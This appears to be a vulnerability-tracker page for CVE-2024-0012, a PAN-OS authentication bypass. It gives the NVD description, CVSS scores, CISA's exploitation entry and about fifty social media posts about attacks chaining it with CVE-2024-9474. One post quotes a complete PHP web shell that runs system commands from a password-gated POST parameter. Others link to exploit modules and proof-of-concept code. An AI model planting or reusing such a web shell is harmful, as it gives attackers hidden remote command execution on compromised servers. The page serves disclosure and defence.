CVE-2024-0012

Published Nov 18, 2024

Last updated a month ago

Insights

Analysis from the Intruder Security Team
Published Nov 19, 2024

The vulnerabilities CVE-2024-0012 and CVE-2024-9474 can be combined to allow for an unauthenticated attacker to gain command line access to the vulnerable device. Compromising a vulnerable device would allow an attacker to gain access to internal networks as these devices are designed to sit on the edge of networks.

The vulnerability is due to a misconfigured Nginx instance and a command injection vulnerability, both of which are exploitable in the devices default state. Watchtowr have released a technical blog post detailing the vulnerability and its exploitation.

Palo Alto have released patches and hotfixes for the PAN-OS vulnerabilities, details are available here and here.

Overview

Description
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Source
psirt@paloaltonetworks.com
NVD status
Analyzed

Risk scores

CVSS 4.0

Type
Secondary
Base score
9.3
Impact score
-
Exploitability score
-
Vector string
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
Severity
CRITICAL

CVSS 3.1

Type
Primary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Known exploits

Data from CISA

Vulnerability name
Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Exploit added on
Nov 18, 2024
Exploit action due
Dec 9, 2024
Required action
Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, management interface for affected devices should not be exposed to untrusted networks, including the internet.

Weaknesses

psirt@paloaltonetworks.com
CWE-306
nvd@nist.gov
CWE-306

Social media

Hype score
Not currently trending
  1. 🔥 CVE-2024-0012 just landed in Metasploit! Ready to level up your #PurpleTeam game? 🛡️ Let's run an attack demo and dive into detection strategies to keep your defenses sharp. 💥 #CyberSecurity #ThreatHunting https://t.co/EOjhIdx55X

    @BriPwn

    9 Jan 2025

    94 Impressions

    0 Retweets

    4 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  2. CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild. Post-explotaition Webshell example dropped. <?php $z="system"; if(${"_POST"}["b"]=="iUqPd") { $z(${"_POST"}["x"]); };

    @byt3n33dl3

    8 Jan 2025

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. 🔥 CVE-2024-0012 just landed in Metasploit! Do you think your Palo Alto firewall is super secure? Guess again! 🛡️ Let's run an attack demo and dive into detection strategies to keep your defenses sharp. 💥#CyberSecurity #ThreatHunting https://t.co/EOjhIdx55X

    @BriPwn

    8 Jan 2025

    108 Impressions

    0 Retweets

    8 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  4. ⚠️#ثغرات PAN-00-OS رقم CVE-2024-0012 و CVE-2024-9474! لا تزال هناك أجهزة #PaloAlto معرضة لتهديدات تصعيد الامتيازات والاستيلاء على النظام. تحقق من PoC لمهاجمة الأجهزة التي لم يتم إصلاحها وكيفية تحديد الإصدار المعرض للخطر باستخدام معلومات القائمة على #ASM! https://t.co/BVD5eerQhm h

    @CriminalIP_AR

    8 Jan 2025

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. ⚠️PAN-OS #취약점 CVE-2024-0012 & CVE-2024-9474 주의! 여전히 권한 탈취와 시스템 장악 위협에 노출된 #팔로알토 장비들이 공개되어 있습니다. 패치되지않은 장비를 공격하는 PoC와 #ASM 기반 위협 인텔리전스로 취약한 버전을 확인하는 방법을 확인해보세요! https://t.co/oZDZfpoNfh https://t.co/z9jmhvAEYz https://t.co/A6yvp0hgod

    @CriminalIP_KR

    8 Jan 2025

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. ⚠️PAN-OS #脆弱性 CVE-2024-0012 & CVE-2024-9474にご注意! 権限奪取とシステム掌握の脅威にさらされている #パロアルト 機器がまだ公開されています。 パッチが適用されていない機器を攻撃するPoCと #ASM ベースの脅威インテリジェンスで脆弱なバージョンを確認する方法をご確認ください!… https://t.co/VeuIaiHB0u https://t.co/K8lNWWuvlW

    @CriminalIP_JP

    8 Jan 2025

    117 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  7. ''Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-framework'' #infosec #pentest #redteam #blueteam https://t.co/3FCdNJYFEh

    @CyberWarship

    3 Jan 2025

    3568 Impressions

    12 Retweets

    47 Likes

    17 Bookmarks

    3 Replies

    1 Quote

  8. Bishop Fox ASM gave teams a 24-hour advantage on the PAN-OS vulnerability (CVE-2024-0012) to safeguard systems before exploits could occur. Join our special town hall for insights and a live Q&A. Get your invite here: https://t.co/VkOu0O3rgc #PANOS #cybersecurity

    @behkfox

    27 Dec 2024

    15 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. Palo Alto merilis pembaruan untuk 2 kerentanan zero-day. CVE-2024-0012 memungkinkan "bypass autentikasi" dan CVE-2024-9474 terkait "eskalasi hak akses". Terungkap lebih dari 11.000 antarmuka manajemen PAN-OS terpapar, termasuk #Indonesia https://t.co/6hk4EV8Cnd https://t.co/KrtH

    @TweetThreatNews

    24 Dec 2024

    53 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  10. #threatreport #MediumCompleteness Wiz observes exploitation in the wild of PAN-OS vulnerabilities. What is CVE-2024-0012? | 21-12-2024 Source: https://t.co/AtO4mCKj8t Key details below ↓ 🧑‍💻Actors/Campaigns: Daggerfly 💀Threats: Sliver_c2_tool, Xmrig_miner,… https://t.co/5HT4

    @rst_cloud

    23 Dec 2024

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. https://t.co/I0KbHzipmc Security breaches in Palo Alto Networks firewall devices On November 18, 2024, Palo Alto Networks announced two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A …

    @B2bCyber

    19 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  12. GitHub - TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC: This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery https://t.co/qwxjv3ZKT4

    @testalways

    14 Dec 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. 🚨We’ve just released a PoC and write-up on exploiting CVE-2024-0012 and CVE-2024-9474 in Palo Alto PAN-OS, demonstrating how these vulnerabilities can be chained for unauthenticated RCE 🔗 PoC Link: https://t.co/OLdPOO1Slt 📖 Write-up: https://t.co/oMHKDyDBEm

    @fahadshah4111

    13 Dec 2024

    64 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  14. 2024年11月分 #MBSD #SOC の検知傾向トピックスを公開しました。 今月は、Palo Alto Networks社のPAN-OSにおける認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃を新たに観測しました。 詳しくはこちら▼ https://t.co/G7Nl0Guxww #mbsd #脆弱性 #SOC… https://t.co/GtcYZyfJc8 https://t.co/egfuyt9Eit

    @mbsdnews

    13 Dec 2024

    589 Impressions

    1 Retweet

    3 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  15. ➡️ In November 2024, @PaloAltoNtwks disclosed two critical #vulnerabilities in PAN-OS, their Next-Generation Firewall operating system: CVE-2024-0012 and CVE-2024-9474. ➡️ Threat actors are actively chaining these vulnerabilities to achieve unauthenticated remote code execution

    @sygnia_labs

    11 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  16. Bishop Fox ASM gave teams a 24-hour head start on the PAN-OS vulnerability (CVE-2024-0012), securing systems before exploits emerged. Join our exclusive town hall for insights & live Q&A. Request your invite: https://t.co/vsB0ViwFld #cybersecurity #PANOS

    @bishopfox

    9 Dec 2024

    45 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  17. 🔒 Word of the Week: "Secure-by-Design" Secure-by-Design ensures security is built into every system, keeping you protected from threats like SocGholish malware, Lumma phishing campaigns, and actively exploited vulnerabilities like CVE-2024-0012. . 👉https://t.co/kiEDGymSSC http

    @GradientCyber

    9 Dec 2024

    46 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  18. What's wrong with you @PaloAltoNtwks ? Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474. https://t.co/R82Ng1GZmg https://t.co/yIRVpTByvX

    @l0rdmalware

    8 Dec 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  19. Why Zero-Day Attacks Bypass Traditional Firewall Security: Defending Against Zero-Day’s like Palo Alto Networks CVE-2024-0012 - https://t.co/DNzqF9wTSR https://t.co/KlhsIjvA1Y

    @spinsafe

    6 Dec 2024

    36 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. A critical vulnerability (CVE-2024-0012) in PAN-OS firewalls threatens secure access and enables unauthorized system exploitation. 🔗https://t.co/6GYce8vSCY #itsecurity #cybersecurity

    @TrueFort

    5 Dec 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  21. 🔐 #Firewalls are vital, but #ZeroDay exploits like Palo Alto CVE-2024-0012 expose their limits. MixMode's #AI detected threats weeks early, giving customers a critical edge. Stay ahead of evolving threats! 👉 Read more: https://t.co/qCq4ErtoXR https://t.co/EIoNJzhErO

    @MixModeAI

    5 Dec 2024

    16 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  22. [NEW VIDEO] @packetdefender explains how users can quickly find critical vulnerabilities like #paloaltonetworks CVE-2024-0012 and CVE-2024-9474; while also addressing #CISA BOD 23-02: Implementation Guidance for Mitigating the Risk from Internet-Exposed Management Interfaces http

    @forwardnetworks

    4 Dec 2024

    35 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  23. #threatreport #LowCompleteness Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) | 02-12-2024 Source: https://t.co/Ufx2z1M2IZ Key details below ↓ 🧑‍💻Actors/Campaigns: Lunar_peek 🎯Victims: Palo alto networks 🌐Geo: Emea

    @rst_cloud

    3 Dec 2024

    107 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  24. Over 2,000 Palo Alto Networks devices compromised in a recent attack, exploiting CVE-2024-0012 & CVE-2024-9474. Stay vigilant and enhance security! Read more: https://t.co/qvngYfWNr0 #PaloAlto #CyberThreats #DataBreach https://t.co/Y4kwYLkeix

    @CyberPro_M

    2 Dec 2024

    73 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  25. Palo Alto PAN-OS の脆弱性 CVE-2024-0012/9474:2,000 台以上のデバイスが危機に直面 https://t.co/lTqsIJY1n2 #CyberAttack #Exploit #Firewall #Government #PaloAlto #PoCExploit #Shadowserver #Vulnerability #ZeroDay

    @iototsecnews

    2 Dec 2024

    207 Impressions

    1 Retweet

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  26. 3/11 Exploited vulnerabilities: CVE-2024-0012 (Auth bypass) and CVE-2024-9474 (Priv. escalation). A dangerous combo for attackers. #FirewallVulnerabilities 🔐

    @Eth1calHackrZ

    2 Dec 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  27. 🚨 2,000+ Palo Alto firewalls compromised! 😱 CVE-2024-0012 lets attackers bypass auth, while CVE-2024-9474 escalates privileges. 📈 Time to tighten up access & patch your systems! 🛡️ #CyberSecurity #Infosec #NetworkSecurity https://t.co/7SEmEXHis9 https://t.co/UEpUJzoTiT

    @WTE_Solutions

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. Palo Alto Networks 製 PAN-OS の脆弱性対策について(CVE-2024-0012等) https://t.co/9tCuM7I6LR

    @testshinotsuka

    1 Dec 2024

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. Top 5 Trending CVEs: 1 - CVE-2024-0012 2 - CVE-2023-28205 3 - CVE-2024-52443 4 - CVE-2024-49019 5 - CVE-2024-11477 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. The Shadowserver Foundation reports that over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. Top targets: US & India. https://t.co/MEkAMzSr7y

    @darkwebinsight

    1 Dec 2024

    37 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    1 Quote

  31. CVE-2024-0012/CVE-2024-9474 : Found in Palo Alto Networks PAN-OS. Weak validation in Nginx configs & inputs allows for auth bypass, leading to admin privilege escalation. https://t.co/tAyhI4npuV

    @hackyboiz

    30 Nov 2024

    2707 Impressions

    18 Retweets

    47 Likes

    14 Bookmarks

    0 Replies

    0 Quotes

  32. Palo Alto Networks 製 PAN-OS の脆弱性対策について(CVE-2024-0012等) https://t.co/9tCuM7I6LR

    @testshinotsuka

    30 Nov 2024

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. Elevation of Privilege - PAN-OS (CVE-2024-9474). The need for authentication and admin access could limit this vulnerability's impact, but here we have the previous vulnerability Authentication Bypass - PAN-OS (CVE-2024-0012). 😏 #PaloAlto ➡️ https://t.co/17vlgiQy75 https://t.co

    @leonov_av

    29 Nov 2024

    69 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. 🚨 Threat Campaign Targets Palo Alto Networks Firewall Devices #CyberThreat #Vulnerabilities 🔑 Key Details: - 🎯 Threat actors exploit Palo Alto Networks PAN-OS vulnerabilities (CVE-2024-0012 & CVE-2024-9474) for remote code execution and privilege escalation. - 🔍 Attacker

    @ctilabs

    29 Nov 2024

    63 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  35. Is your PAN-OS updated? Two critical vulnerabilities, CVE-2024-0012 & CVE-2024-9474, can expose your network to serious threats. Don't wait! Secure your devices now with the latest patches. Protect your data and peace of mind. #CyberSecurity https://t.co/lDToZtOHwb

    @sequretek_sqtk

    29 Nov 2024

    34 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  36. 🦃Gobble up this info: While you’re passing the stuffing, don’t forget to check out Warning 25-040 - Palo Alto Active Exploitation available on DIBNet. A CVE-2024-0012 affecting Palo Alto PAN-OS is actively exploited. 🍂#HappyThanksgiving #CyberResilience #DIB https://t.co/nhvi4w

    @DC3DCISE

    28 Nov 2024

    98 Impressions

    2 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  37. 🚨Over 2000 Palo Alto Networks devices compromised! Hackers exploit CVEs(CVE-2024-0012 & CVE-2024-9474)to deploy malware like web shells and crypto miners.Immediate patching and securing management access are crucial source:https://t.co/W8UtsxkX9J #CyberSecurity #Vulnerabilit

    @ANlKsaha

    27 Nov 2024

    53 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  38. Copilot for Security Prompt of the Day: Provide guidance for CVE-2024-0012, CVE-2024-9474 affecting PAN-OS. And, then... Provide KQL queries. https://t.co/1o18sBq1CL Now read: Guidance for CVE-2024-0012, CVE-2024-9474 affecting PAN-OS using Microsoft Security capabilities…

    @rodtrent

    26 Nov 2024

    571 Impressions

    2 Retweets

    3 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  39. Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) https://t.co/QtEN83shkT

    @rootsecdev

    26 Nov 2024

    762 Impressions

    2 Retweets

    3 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  40. 🎯 Zero-day week on Radio Infosec The past week brought so many "patch soon" news items that a separate digest was needed. 🎯 PanOS: Palo Alto firewalls received patches for CVE-2024-0012 and CVE-2024-9474, which together allow for authentication bypass and privilege escalation…

    @kaspersky

    26 Nov 2024

    1239 Impressions

    2 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  41. 🚨 Cybersecurity Alert 🚨 Over 2,000 Palo Alto Networks devices compromised due to exploited security flaws (CVE-2024-0012 & CVE-2024-9474). Threat actors are dropping web shells & crypto miners! #Hacking #news #CyberSecurity #PaloAltoNetworks https://t.co/XS9KkJQxez

    @safeyourweb

    26 Nov 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. パロアルトのファイアウォール大規模乗っ取り事案について ⚠️ 何が起きた? 約2,000台のパロアルトファイアウォールが侵害 攻撃者がバックドアや暗号通貨マイナーを仕掛けることに成功。現在も攻撃が継続中 🔍 原因は? 2つの脆弱性を組み合わせた攻撃: 認証回避の脆弱性(CVE-2024-0012)… https://t.co/aVoHGH923Z

    @naganohrfm

    26 Nov 2024

    87 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  43. The Shadowserver Foundation reports over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. https://t.co/lu9FvbiWfU

    @blackwired32799

    25 Nov 2024

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  44. Файрволи потенційно 1000+ клієнтів Palo Alto Networks зламано Повідомляють про 2 zero-day: 1. CVE-2024-0012: Вразливість обходу автентифікації в веб-інтерфейсі управління PAN-OS. 2. CVE-2024-9474: Вразливість підвищення привілеїв у веб-інтерфейсі управління PAN-OS. 1/2

    @uaprotech

    25 Nov 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    1 Quote

  45. • Hackers exploited critical vulnerabilities (CVE-2024-0012, CVE-2024-9474) in Palo Alto Networks firewalls, enabling remote code execution. • Thousands of devices were compromised, though numbers dropped after patches were issued. https://t.co/p43DNFgGsy

    @F_Chkeel

    25 Nov 2024

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  46. Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) : https://t.co/LRVMnN95L7

    @binitamshah

    25 Nov 2024

    3571 Impressions

    7 Retweets

    26 Likes

    13 Bookmarks

    0 Replies

    0 Quotes

  47. Over 2,000 Palo Alto firewalls hacked using recently patched bugs😯🥷 https://t.co/azg8be9dNq #CyberSecurityAwareness #cybersecuritynews The two security flaws are an authentication bypass (CVE-2024-0012) in the PAN-OS management web interface that remote attackers can exploit…

    @letsexploit

    25 Nov 2024

    39 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  48. Up to 2,000 Palo Alto Networks devices compromised via CVE-2024-0012 & CVE-2024-9474 flaws. Exploits dropping malware like Sliver & crypto miners. Patch NOW! # https://t.co/01bsNWOvaQ

    @TLDRStories

    25 Nov 2024

    35 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. ⚠️ Palo Alto Networks Authentication bypass vulnerability CVE-2024-0012: An authentication bypass vulnerability in PAN-OS allows attackers to gain administrator privileges.

    @cyberthreatzip

    25 Nov 2024

    14 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  50. 🚨 2,000+ #PaloAltoNetworks firewalls hacked! 🚨 Hackers exploited recent PAN-OS zero-days (CVE-2024-0012 & CVE-2024-9474) to gain remote admin access and escalate privileges. Palo Alto urges securing firewall access. 🔒 Source: @redhotcyber #CyberSecurity #ZeroDay #PANO

    @HWGSababa

    25 Nov 2024

    21 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations